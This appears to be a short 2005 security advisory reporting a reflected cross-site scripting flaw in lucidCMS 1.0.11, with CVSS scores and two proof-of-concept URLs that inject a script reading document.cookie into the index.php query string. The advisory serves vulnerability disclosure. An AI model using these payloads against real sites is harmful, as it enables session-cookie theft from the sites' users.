lucidCMS 1.0.11 is susceptible to a cross site scripting attack

2005.09.27
Credit: X1ngBox
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

[Description]: lucidCMS is a simple and flexible content management system for the individual or organization that wishes to manage a collection of webpages without the overhead and complexity of other available "community" CMS options. [version]:lucidCMS 1.0.11 [vendor]:www.lucidcms.net [Vulnerability]: cross site script [exploit]: http://[host]/[cms]/index.php?<script>alert(document.cookie);</script> http://[host]/[cms]/?<script>alert(document.cookie);</script> .......[X1NG].......... X1ngBox <at/> Gmail Com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top